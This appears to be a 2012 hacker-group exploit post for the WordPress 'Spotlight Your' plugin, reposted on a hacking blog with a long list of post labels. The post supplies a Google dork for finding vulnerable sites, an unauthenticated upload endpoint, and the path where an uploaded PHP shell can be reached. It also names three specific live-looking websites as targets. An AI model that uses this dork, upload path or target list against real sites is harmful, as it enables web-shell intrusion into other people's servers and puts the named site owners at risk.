___________.__ _________ _________
\__ ___/| |__ ____ \_ ___ \______ ______ _ ________ \_ ___ \______ ______ _ __
| | | | \_/ __ \ / \ \|_ __ \/ _ \ \/ \/ / ___/ / \ \|_ __ \/ __ \ \/ \/ /
| | | Y \ ___/ \ \___| | \( <_> ) /\___ \ \ \___| | \| ___/\ /
|____| |___| /\___ > \______ /__| \____/ \/\_//____ > \______ /__| \___ >\/\_/
\/ \/ \/ \/ \/ \/
INDO-PENDENT HACKER
http://thecrowscrew.org
#################################################################################################
Exploit Title: Wordpress Plugins Spotlight Your Upload Vulnerability
Google Dork: inurl:"/wp-content/plugins/spotlightyour/"
Date: 18/11/2012
Locations: Banjarmasin, Indonesia
Author: ovanIsmycode & walangkaji
Contact: rootx@thecrowscrew.org & walangkaji@thecrowscrew.org
Software Link: http://www.spotlightyour.com
#################################################################################################
[+] POC
Exp. Target :
- http://domain.com/wp-content/plugins/spotlightyour/
Exploit :
- /monetize/upload/index.php
Shell Access :
- http://domain.com/wp-content/uploads/[year]/[month]/[search your shell].php
Ending :
- Fraksi Bejoug a.k.a Kalam Saheru
Saparatoss Blank Blank
awkwkwkwk :v
http://beautyexo.com/wp-content/plugins/spotlightyour/monetize/upload/
http://www.promogotion.com/wp-content/plugins/spotlightyour/monetize/upload/
http://shopping.businessminister.com/wp-content/plugins/spotlightyour/monetize/upload/
#################################################################################################
Spec!4L th4nk'5 to :
MsconfiX, Catalyst71, Gabby, din_muh, don_ojan, DendyIsMe, kit4r0, 777r, ph_ovtl4w, adecakep7,
penjamoen, -=[The Crows Crew]=-, Indonesian Hacker
thecrowscrew.org, hacker-newbie.org, yogyacarderlink.web.id, devilzc0de.org
########################################[end]####################################################
# 1337day.com [2012-11-19]
Subscribe to:
Post Comments (Atom)
Post Labels
- .htaccess
- 0-day
- Add-on
- AutoIT
- BackConnect
- BackDoor
- BackTrack
- Blogger
- Blogger Template
- Botnet
- Brute
- Bypass
- CEH
- CGI
- Checked
- Chrome
- Code
- Code RIP
- cPanel
- Crack
- CSRF
- CSS
- DDoS
- Decode
- DNS
- dork
- Drupal
- Ebook
- ebook hacking
- Encryption
- Exploit
- FireFox
- Flood
- Get Root
- GHDB
- Gmail
- Hacker
- hacker os
- Hacking and Security
- Hacking Tools
- HTML
- HTML5
- Infographic
- Internet Explorer
- IT News
- J2TeaM
- J2TeaM Tools
- Java
- JavaScript
- Javascript Injection
- Joomla
- keylog
- Lab Hack
- Linux
- Local Attack
- Local File Include
- Malware
- Metasploit
- Microsoft
- MyBB
- MySQL
- Network
- newbie
- newbie area vhb
- Oracle
- Password
- Path Disclosure
- Pen-Test
- Perl
- Phishing
- PHP
- Plugin
- Programming
- Python
- Remote Code Execution
- Remote Desktop
- Remote File Include
- Reverse
- Scanner
- Security
- SEO
- Shell
- Social Engineering
- Software
- SQL Injection
- Symlink
- Tản mạn
- thiet ke web
- Thủ Thuật
- Thủ thuật blog
- Tips
- Tools
- Tricks
- TUTORIALS
- Upload
- vBulletin
- vhb
- Vietnamese ebook
- Virus
- Vulnerability
- Web Developer
- WHMCS
- WiFi
- Windows
- WordPress
- Write-up
- XSS
- Yahoo
- Youtube
Post a Comment